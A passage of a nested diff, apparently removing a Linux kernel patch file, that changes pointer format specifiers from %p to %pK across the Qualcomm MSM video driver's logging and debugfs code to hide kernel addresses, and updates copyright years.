- 				__func__, inst, abort_completion);
- 		rc = -EBUSY;
- 	} else {
-@@ -2023,7 +2023,7 @@ static void handle_thermal_event(struct msm_vidc_core *core)
- 		mutex_unlock(&core->lock);
- 		if (inst->state >= MSM_VIDC_OPEN_DONE &&
- 			inst->state < MSM_VIDC_CLOSE_DONE) {
--			dprintk(VIDC_WARN, "%s: abort inst %p\n",
-+			dprintk(VIDC_WARN, "%s: abort inst %pK\n",
- 				__func__, inst);
- 
- 			change_inst_state(inst, MSM_VIDC_CORE_INVALID);
-@@ -2035,7 +2035,7 @@ static void handle_thermal_event(struct msm_vidc_core *core)
- 				goto err_sess_abort;
- 			}
- 			dprintk(VIDC_WARN,
--				"%s Send sys error for inst %p\n",
-+				"%s Send sys error for inst %pK\n",
- 				__func__, inst);
- 			msm_vidc_queue_v4l2_event(inst,
- 					V4L2_EVENT_MSM_VIDC_SYS_ERROR);
-@@ -2290,7 +2290,7 @@ static int msm_comm_session_init(int flipped_state,
- 	hdev = inst->core->device;
- 
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_OPEN)) {
--		dprintk(VIDC_INFO, "inst: %p is already in state: %d\n",
-+		dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n",
- 						inst, inst->state);
- 		goto exit;
- 	}
-@@ -2311,7 +2311,7 @@ static int msm_comm_session_init(int flipped_state,
- 
- 	if (!inst->session) {
- 		dprintk(VIDC_ERR,
--			"Failed to call session init for: %p, %p, %d, %d\n",
-+			"Failed to call session init for: %pK, %pK, %d, %d\n",
- 			inst->core->device, inst,
- 			inst->session_type, fourcc);
- 		rc = -EINVAL;
-@@ -2405,7 +2405,7 @@ static int msm_vidc_load_resources(int flipped_state,
- 
- 	hdev = core->device;
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_LOAD_RESOURCES)) {
--		dprintk(VIDC_INFO, "inst: %p is already in state: %d\n",
-+		dprintk(VIDC_INFO, "inst: %pK is already in state: %d\n",
- 						inst, inst->state);
- 		goto exit;
- 	}
-@@ -2441,7 +2441,7 @@ static int msm_vidc_start(int flipped_state, struct msm_vidc_inst *inst)
- 
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_START)) {
- 		dprintk(VIDC_INFO,
--			"inst: %p is already in state: %d\n",
-+			"inst: %pK is already in state: %d\n",
- 			inst, inst->state);
- 		goto exit;
- 	}
-@@ -2471,7 +2471,7 @@ static int msm_vidc_stop(int flipped_state, struct msm_vidc_inst *inst)
- 
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_STOP)) {
- 		dprintk(VIDC_INFO,
--			"inst: %p is already in state: %d\n",
-+			"inst: %pK is already in state: %d\n",
- 			inst, inst->state);
- 		goto exit;
- 	}
-@@ -2501,7 +2501,7 @@ static int msm_vidc_release_res(int flipped_state, struct msm_vidc_inst *inst)
- 
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_RELEASE_RESOURCES)) {
- 		dprintk(VIDC_INFO,
--			"inst: %p is already in state: %d\n",
-+			"inst: %pK is already in state: %d\n",
- 			inst, inst->state);
- 		goto exit;
- 	}
-@@ -2533,7 +2533,7 @@ static int msm_comm_session_close(int flipped_state,
- 	hdev = inst->core->device;
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_CLOSE)) {
- 		dprintk(VIDC_INFO,
--			"inst: %p is already in state: %d\n",
-+			"inst: %pK is already in state: %d\n",
- 						inst, inst->state);
- 		goto exit;
- 	}
-@@ -2939,16 +2939,16 @@ int msm_comm_try_state(struct msm_vidc_inst *inst, int state)
- 	struct msm_vidc_core *core;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	dprintk(VIDC_DBG,
--			"Trying to move inst: %p from: 0x%x to 0x%x\n",
-+			"Trying to move inst: %pK from: 0x%x to 0x%x\n",
- 			inst, inst->state, state);
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", inst);
-+				"Invalid core pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	mutex_lock(&inst->sync_lock);
-@@ -3117,7 +3117,7 @@ int msm_comm_qbuf(struct vb2_buffer *vb)
- 	int extra_idx = 0;
- 
- 	if (!vb || !vb->vb2_queue)  {
--		dprintk(VIDC_ERR, "%s: Invalid input: %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid input: %pK\n",
- 			__func__, vb);
- 		return -EINVAL;
- 	}
-@@ -3125,7 +3125,7 @@ int msm_comm_qbuf(struct vb2_buffer *vb)
- 	q = vb->vb2_queue;
- 	inst = q->drv_priv;
- 	if (!inst) {
--		dprintk(VIDC_ERR, "%s: Invalid input: %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid input: %pK\n",
- 			__func__, vb);
- 		return -EINVAL;
- 	}
-@@ -3133,12 +3133,12 @@ int msm_comm_qbuf(struct vb2_buffer *vb)
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--			"Invalid input: %p, %p, %p\n", inst, core, vb);
-+			"Invalid input: %pK, %pK, %pK\n", inst, core, vb);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "%s: Invalid input: %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid input: %pK\n",
- 			__func__, hdev);
- 		return -EINVAL;
- 	}
-@@ -3292,7 +3292,7 @@ int msm_comm_qbuf(struct vb2_buffer *vb)
- 					(void *) inst->session, &seq_hdr);
- 				if (!rc) {
- 					inst->vb2_seq_hdr = vb;
--					dprintk(VIDC_DBG, "Seq_hdr: %p\n",
-+					dprintk(VIDC_DBG, "Seq_hdr: %pK\n",
- 						inst->vb2_seq_hdr);
- 				}
- 				atomic_dec(&inst->seq_hdr_reqs);
-@@ -3406,7 +3406,7 @@ int msm_comm_try_get_prop(struct msm_vidc_inst *inst, enum hal_property ptype,
- 		msecs_to_jiffies(msm_vidc_hw_rsp_timeout));
- 	if (!rc) {
- 		dprintk(VIDC_ERR,
--			"%s: Wait interrupted or timed out [%p]: %d\n",
-+			"%s: Wait interrupted or timed out [%pK]: %d\n",
- 			__func__, inst,
- 			SESSION_MSG_INDEX(SESSION_PROPERTY_INFO));
- 		inst->state = MSM_VIDC_CORE_INVALID;
-@@ -3444,18 +3444,18 @@ int msm_comm_release_output_buffers(struct msm_vidc_inst *inst)
- 	struct hfi_device *hdev;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", core);
-+				"Invalid core pointer = %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+		dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- 		return -EINVAL;
- 	}
- 	mutex_lock(&inst->outputbufs.lock);
-@@ -3551,18 +3551,18 @@ int msm_comm_release_scratch_buffers(struct msm_vidc_inst *inst,
- 	enum hal_buffer sufficiency = HAL_BUFFER_NONE;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", core);
-+				"Invalid core pointer = %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+		dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- 		return -EINVAL;
- 	}
- 
-@@ -3639,18 +3639,18 @@ int msm_comm_release_persist_buffers(struct msm_vidc_inst *inst)
- 	struct hfi_device *hdev;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", core);
-+				"Invalid core pointer = %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+		dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- 		return -EINVAL;
- 	}
- 
-@@ -3699,7 +3699,7 @@ int msm_comm_try_set_prop(struct msm_vidc_inst *inst,
- 	int rc = 0;
- 	struct hfi_device *hdev;
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid input: %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid input: %pK\n", inst);
- 		return -EINVAL;
- 	}
- 
-@@ -3913,7 +3913,7 @@ void msm_comm_flush_pending_dynamic_buffers(struct msm_vidc_inst *inst)
- 	list_for_each_entry(binfo, &inst->registeredbufs.list, list) {
- 		if (binfo->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) {
- 			dprintk(VIDC_DBG,
--				"%s: binfo = %p device_addr = 0x%pa\n",
-+				"%s: binfo = %pK device_addr = 0x%pa\n",
- 				__func__, binfo, &binfo->device_addr[0]);
- 			buf_ref_put(inst, binfo);
- 		}
-@@ -3933,18 +3933,18 @@ int msm_comm_flush(struct msm_vidc_inst *inst, u32 flags)
- 	struct hfi_device *hdev;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", core);
-+				"Invalid core pointer = %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+		dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- 		return -EINVAL;
- 	}
- 
-@@ -3961,7 +3961,7 @@ int msm_comm_flush(struct msm_vidc_inst *inst, u32 flags)
- 		core->state == VIDC_CORE_UNINIT ||
- 		core->state == VIDC_CORE_INVALID) {
- 		dprintk(VIDC_ERR,
--				"Core %p and inst %p are in bad state\n",
-+				"Core %pK and inst %pK are in bad state\n",
- 					core, inst);
- 		msm_comm_flush_in_invalid_state(inst);
- 		return 0;
-@@ -4153,7 +4153,7 @@ int msm_vidc_trigger_ssr(struct msm_vidc_core *core,
- 	int rc = 0;
- 	struct hfi_device *hdev;
- 	if (!core || !core->device) {
--		dprintk(VIDC_WARN, "Invalid parameters: %p\n", core);
-+		dprintk(VIDC_WARN, "Invalid parameters: %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
-@@ -4389,7 +4389,7 @@ int msm_comm_kill_session(struct msm_vidc_inst *inst)
- 		change_inst_state(inst, MSM_VIDC_CLOSE_DONE);
- 	} else {
- 		dprintk(VIDC_WARN,
--				"Inactive session %p, triggering an internal session error\n",
-+				"Inactive session %pK, triggering an internal session error\n",
- 				inst);
- 		msm_comm_generate_session_error(inst);
- 
-@@ -4421,7 +4421,7 @@ struct msm_smem *msm_comm_smem_alloc(struct msm_vidc_inst *inst,
- 	struct msm_smem *m = NULL;
- 
- 	if (!inst || !inst->core) {
--		dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst);
- 		return NULL;
- 	}
- 	mutex_lock(&inst->core->lock);
-@@ -4439,7 +4439,7 @@ void msm_comm_smem_free(struct msm_vidc_inst *inst, struct msm_smem *mem)
- {
- 	if (!inst || !inst->core || !mem) {
- 		dprintk(VIDC_ERR,
--			"%s: invalid params: %p %p\n", __func__, inst, mem);
-+			"%s: invalid params: %pK %pK\n", __func__, inst, mem);
- 		return;
- 	}
- 
-@@ -4458,7 +4458,7 @@ int msm_comm_smem_cache_operations(struct msm_vidc_inst *inst,
- {
- 	if (!inst || !mem) {
- 		dprintk(VIDC_ERR,
--			"%s: invalid params: %p %p\n", __func__, inst, mem);
-+			"%s: invalid params: %pK %pK\n", __func__, inst, mem);
- 		return -EINVAL;
- 	}
- 	return msm_smem_cache_operations(inst->mem_client, mem, cache_ops);
-@@ -4470,7 +4470,7 @@ struct msm_smem *msm_comm_smem_user_to_kernel(struct msm_vidc_inst *inst,
- 	struct msm_smem *m = NULL;
- 
- 	if (!inst || !inst->core) {
--		dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst);
- 		return NULL;
- 	}
- 
-@@ -4496,7 +4496,7 @@ int msm_comm_smem_get_domain_partition(struct msm_vidc_inst *inst,
- 			int *domain_num, int *partition_num)
- {
- 	if (!inst || !domain_num || !partition_num) {
--		dprintk(VIDC_ERR, "%s: invalid params: %p %p %p\n",
-+		dprintk(VIDC_ERR, "%s: invalid params: %pK %pK %pK\n",
- 			__func__, inst, domain_num, partition_num);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c b/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c
-index 708b44a..231ec66 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014 - 2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014 - 2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -40,7 +40,7 @@ static inline int msm_dcvs_count_active_instances(struct msm_vidc_core *core)
- 	struct msm_vidc_inst *inst = NULL;
- 
- 	if (!core) {
--		dprintk(VIDC_ERR, "%s: Invalid args: %p\n", __func__, core);
-+		dprintk(VIDC_ERR, "%s: Invalid args: %pK\n", __func__, core);
- 		return -EINVAL;
- 	}
- 
-@@ -116,7 +116,7 @@ static void msm_dcvs_dec_check_and_scale_clocks(struct msm_vidc_inst *inst)
- void msm_dcvs_check_and_scale_clocks(struct msm_vidc_inst *inst, bool is_etb)
- {
- 	if (!inst) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- 		return;
- 	}
- 
-@@ -168,7 +168,7 @@ void msm_dcvs_init_load(struct msm_vidc_inst *inst)
- 	dprintk(VIDC_DBG, "Init DCVS Load\n");
- 
- 	if (!inst || !inst->core) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- 		return;
- 	}
- 
-@@ -217,7 +217,7 @@ void msm_dcvs_init(struct msm_vidc_inst *inst)
- 	dprintk(VIDC_DBG, "Init DCVS Struct\n");
- 
- 	if (!inst) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- 		return;
- 	}
- 
-@@ -234,7 +234,7 @@ void msm_dcvs_monitor_buffer(struct msm_vidc_inst *inst)
- 	struct hal_buffer_requirements *output_buf_req;
- 
- 	if (!inst) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- 		return;
- 	}
- 	dcvs = &inst->dcvs;
-@@ -243,7 +243,7 @@ void msm_dcvs_monitor_buffer(struct msm_vidc_inst *inst)
- 	output_buf_req = get_buff_req_buffer(inst,
- 				msm_comm_get_hal_output_buffer(inst));
- 	if (!output_buf_req) {
--		dprintk(VIDC_ERR, "%s : Get output buffer req failed %p\n",
-+		dprintk(VIDC_ERR, "%s : Get output buffer req failed %pK\n",
- 			__func__, inst);
- 		mutex_unlock(&inst->lock);
- 		return;
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-index c422ed7..5cf5e81 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -76,13 +76,13 @@ static ssize_t core_info_read(struct file *file, char __user *buf,
- 	int i = 0, rc = 0;
- 
- 	if (!core || !core->device) {
--		dprintk(VIDC_ERR, "Invalid params, core: %p\n", core);
-+		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core);
- 		return 0;
- 	}
- 	hdev = core->device;
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
--	write_str(&dbg_buf, "CORE %d: 0x%p\n", core->id, core);
-+	write_str(&dbg_buf, "CORE %d: 0x%pK\n", core->id, core);
- 	write_str(&dbg_buf, "===============================\n");
- 	write_str(&dbg_buf, "Core state: %d\n", core->state);
- 	rc = call_hfi_op(hdev, get_fw_info, hdev->hfi_device_data, &fw_info);
-@@ -242,7 +242,7 @@ struct dentry *msm_vidc_debugfs_init_core(struct msm_vidc_core *core,
- 	struct dentry *dir = NULL;
- 	char debugfs_name[MAX_DEBUGFS_NAME];
- 	if (!core) {
--		dprintk(VIDC_ERR, "Invalid params, core: %p\n", core);
-+		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core);
- 		goto failed_create_dir;
- 	}
- 
-@@ -306,15 +306,15 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- 	struct msm_vidc_inst *inst = file->private_data;
- 	int i, j;
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid params, core: %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", inst);
- 		return 0;
- 	}
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
--	write_str(&dbg_buf, "INSTANCE: 0x%p (%s)\n", inst,
-+	write_str(&dbg_buf, "INSTANCE: 0x%pK (%s)\n", inst,
- 		inst->session_type == MSM_VIDC_ENCODER ? "Encoder" : "Decoder");
- 	write_str(&dbg_buf, "===============================\n");
--	write_str(&dbg_buf, "core: 0x%p\n", inst->core);
-+	write_str(&dbg_buf, "core: 0x%pK\n", inst->core);
- 	write_str(&dbg_buf, "height: %d\n", inst->prop.height[CAPTURE_PORT]);
- 	write_str(&dbg_buf, "width: %d\n", inst->prop.width[CAPTURE_PORT]);
- 	write_str(&dbg_buf, "fps: %d\n", inst->prop.fps);
-@@ -381,10 +381,10 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst,
- 	struct dentry *dir = NULL;
- 	char debugfs_name[MAX_DEBUGFS_NAME];
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid params, inst: %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid params, inst: %pK\n", inst);
- 		goto failed_create_dir;
- 	}
--	snprintf(debugfs_name, MAX_DEBUGFS_NAME, "inst_%p", inst);
-+	snprintf(debugfs_name, MAX_DEBUGFS_NAME, "inst_%pK", inst);
- 	dir = debugfs_create_dir(debugfs_name, parent);
- 	if (!dir) {
- 		dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n");
-diff --git a/drivers/media/platform/msm/vidc/q6_hfi.c b/drivers/media/platform/msm/vidc/q6_hfi.c
-index 10f4baa..31f6263 100644
---- a/drivers/media/platform/msm/vidc/q6_hfi.c
-+++ b/drivers/media/platform/msm/vidc/q6_hfi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -202,7 +202,7 @@ static int q6_hfi_register_iommu_domains(struct q6_hfi_device *device)
- 	struct iommu_info *iommu_map;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "Invalid parameter: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -220,7 +220,7 @@ static int q6_hfi_register_iommu_domains(struct q6_hfi_device *device)
- 		domain = iommu_group_get_iommudata(iommu_map->group);
- 		if (IS_ERR_OR_NULL(domain)) {
- 			dprintk(VIDC_ERR,
--					"Failed to get domain data for group %p\n",
-+					"Failed to get domain data for group %pK\n",
- 					iommu_map->group);
- 			rc = -EINVAL;
- 			goto fail_group;
-@@ -228,7 +228,7 @@ static int q6_hfi_register_iommu_domains(struct q6_hfi_device *device)
- 		iommu_map->domain = msm_find_domain_no(domain);
- 		if (iommu_map->domain < 0) {
- 			dprintk(VIDC_ERR,
--					"Failed to get domain index for domain %p\n",
-+					"Failed to get domain index for domain %pK\n",
- 					domain);
- 			rc = -EINVAL;
- 			goto fail_group;
-@@ -254,7 +254,7 @@ static void q6_hfi_deregister_iommu_domains(struct q6_hfi_device *device)
- 	int i = 0;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "Invalid parameter: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device);
- 		return;
- 	}
- 
-@@ -347,7 +347,7 @@ static void *q6_hfi_get_device(u32 device_id,
- 	int rc = 0;
- 
- 	if (!callback) {
--		dprintk(VIDC_ERR, "%s Invalid params:  %p\n",
-+		dprintk(VIDC_ERR, "%s Invalid params:  %pK\n",
- 			__func__, callback);
- 		return NULL;
- 	}
-@@ -663,7 +663,7 @@ static int q6_hfi_session_clean(void *session)
- 		return -EINVAL;
- 	}
- 	sess_close = session;
--	dprintk(VIDC_DBG, "deleted the session: 0x%p\n",
-+	dprintk(VIDC_DBG, "deleted the session: 0x%pK\n",
- 			sess_close->session_id);
- 	mutex_lock(&((struct q6_hfi_device *)
- 			sess_close->device)->session_lock);
-@@ -1207,7 +1207,7 @@ static int q6_hfi_iommu_attach(struct q6_hfi_device *device)
- 	struct iommu_info *iommu_map;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "Invalid parameter: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -1222,7 +1222,7 @@ static int q6_hfi_iommu_attach(struct q6_hfi_device *device)
- 			rc = PTR_ERR(domain) ?: -EINVAL;
- 			break;
- 		}
--		dprintk(VIDC_DBG, "Attaching domain(id:%d) %p to group %p\n",
-+		dprintk(VIDC_DBG, "Attaching domain(id:%d) %pK to group %pK\n",
- 				iommu_map->domain, domain, group);
- 		rc = iommu_attach_group(domain, group);
- 		if (rc) {
-@@ -1253,7 +1253,7 @@ static void q6_hfi_iommu_detach(struct q6_hfi_device *device)
- 	int i;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "Invalid parameter: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device);
- 		return;
- 	}
- 
-@@ -1382,7 +1382,7 @@ int q6_hfi_initialize(struct hfi_device *hdev, u32 device_id,
- 	int rc = 0;
- 
- 	if (!hdev || !res || !callback) {
--		dprintk(VIDC_ERR, "Invalid params: %p %p %p\n",
-+		dprintk(VIDC_ERR, "Invalid params: %pK %pK %pK\n",
- 				hdev, res, callback);
- 		rc = -EINVAL;
- 		goto err_hfi_init;
-diff --git a/drivers/media/platform/msm/vidc/venus_hfi.c b/drivers/media/platform/msm/vidc/venus_hfi.c
-index 76ad1bc..0015c84 100644
---- a/drivers/media/platform/msm/vidc/venus_hfi.c
-+++ b/drivers/media/platform/msm/vidc/venus_hfi.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -370,7 +370,7 @@ static int venus_hfi_write_queue(void *info, u8 *packet, u32 *rx_req_is_set)
- 	}
- 
- 	if (msm_vidc_debug & VIDC_PKT) {
--		dprintk(VIDC_PKT, "%s: %p\n", __func__, qinfo);
-+		dprintk(VIDC_PKT, "%s: %pK\n", __func__, qinfo);
- 		venus_hfi_dump_packet(packet);
- 	}
- 
-@@ -580,7 +580,7 @@ static int venus_hfi_read_queue(void *info, u8 *packet, u32 *pb_tx_req_is_set)
- 
- 	if ((msm_vidc_debug & VIDC_PKT) &&
- 		(queue->qhdr_type & HFI_Q_ID_CTRL_TO_HOST_MSG_Q)) {
--		dprintk(VIDC_PKT, "%s: %p\n", __func__, qinfo);
-+		dprintk(VIDC_PKT, "%s: %pK\n", __func__, qinfo);
- 		venus_hfi_dump_packet(packet);
- 	}
- 
-@@ -611,7 +611,7 @@ static int venus_hfi_alloc(struct venus_hfi_device *dev, void *mem,
- 		rc = -ENOMEM;
- 		goto fail_smem_alloc;
- 	}
--	dprintk(VIDC_DBG, "venus_hfi_alloc: ptr = %p, size = %d\n",
-+	dprintk(VIDC_DBG, "venus_hfi_alloc: ptr = %pK, size = %d\n",
- 			alloc->kvaddr, size);
- 	rc = msm_smem_cache_operations(dev->hal_client, alloc,
- 		SMEM_CACHE_CLEAN);
-@@ -631,7 +631,7 @@ fail_smem_alloc:
- static void venus_hfi_free(struct venus_hfi_device *dev, struct msm_smem *mem)
- {
- 	if (!dev || !mem) {
--		dprintk(VIDC_ERR, "invalid param %p %p\n", dev, mem);
-+		dprintk(VIDC_ERR, "invalid param %pK %pK\n", dev, mem);
- 		return;
- 	}
- 
-@@ -647,7 +647,7 @@ static void venus_hfi_write_register(
- 	u32 hwiosymaddr = reg;
- 	u8 *base_addr;
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return;
- 	}
- 	if (device->clk_state != ENABLED_PREPARED) {
-@@ -657,7 +657,7 @@ static void venus_hfi_write_register(
- 	}
- 
- 	base_addr = device->hal_data->register_base;
--	dprintk(VIDC_DBG, "Base addr: 0x%p, written to: 0x%x, Value: 0x%x...\n",
-+	dprintk(VIDC_DBG, "Base addr: 0x%pK, written to: 0x%x, Value: 0x%x...\n",
- 		base_addr, hwiosymaddr, value);
- 	base_addr += hwiosymaddr;
- 	writel_relaxed(value, base_addr);
-@@ -669,7 +669,7 @@ static int venus_hfi_read_register(struct venus_hfi_device *device, u32 reg)
- 	int rc = 0;
- 	u8 *base_addr;
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	}
- 	if (device->clk_state != ENABLED_PREPARED) {
-@@ -681,7 +681,7 @@ static int venus_hfi_read_register(struct venus_hfi_device *device, u32 reg)
- 
- 	rc = readl_relaxed(base_addr + reg);
- 	rmb();
--	dprintk(VIDC_DBG, "Base addr: 0x%p, read from: 0x%x, value: 0x%x...\n",
-+	dprintk(VIDC_DBG, "Base addr: 0x%pK, read from: 0x%x, value: 0x%x...\n",
- 		base_addr, reg, rc);
- 
- 	return rc;
-@@ -783,7 +783,7 @@ static void venus_hfi_iommu_detach(struct venus_hfi_device *device)
- 	int i;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "Invalid paramter: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid paramter: %pK\n", device);
- 		return;
- 	}
- 
-@@ -1209,7 +1209,7 @@ static int __alloc_ocmem(struct venus_hfi_device *device)
- 	unsigned long size;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n",
-+		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n",
- 				__func__, device);
- 		return -EINVAL;
- 	}
-@@ -1244,7 +1244,7 @@ static int __free_ocmem(struct venus_hfi_device *device)
- 	int rc = 0;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n",
-+		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n",
- 				__func__, device);
- 		return -EINVAL;
- 	}
-@@ -1268,14 +1268,14 @@ static int __set_ocmem(struct venus_hfi_device *device, bool locked)
- 	struct on_chip_mem *ocmem;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n",
-+		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n",
- 				__func__, device);
- 		return -EINVAL;
- 	}
- 
- 	ocmem = &device->resources.ocmem;
- 	if (!ocmem->buf) {
--		dprintk(VIDC_ERR, "Invalid params, ocmem_buffer: 0x%p\n",
-+		dprintk(VIDC_ERR, "Invalid params, ocmem_buffer: 0x%pK\n",
- 			ocmem->buf);
- 		return -EINVAL;
- 	}
-@@ -1304,7 +1304,7 @@ static int __unset_ocmem(struct venus_hfi_device *device)
- 	int rc = 0;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%p\n",
-+		dprintk(VIDC_ERR, "%s Invalid param, device: 0x%pK\n",
- 				__func__, device);
- 		rc = -EINVAL;
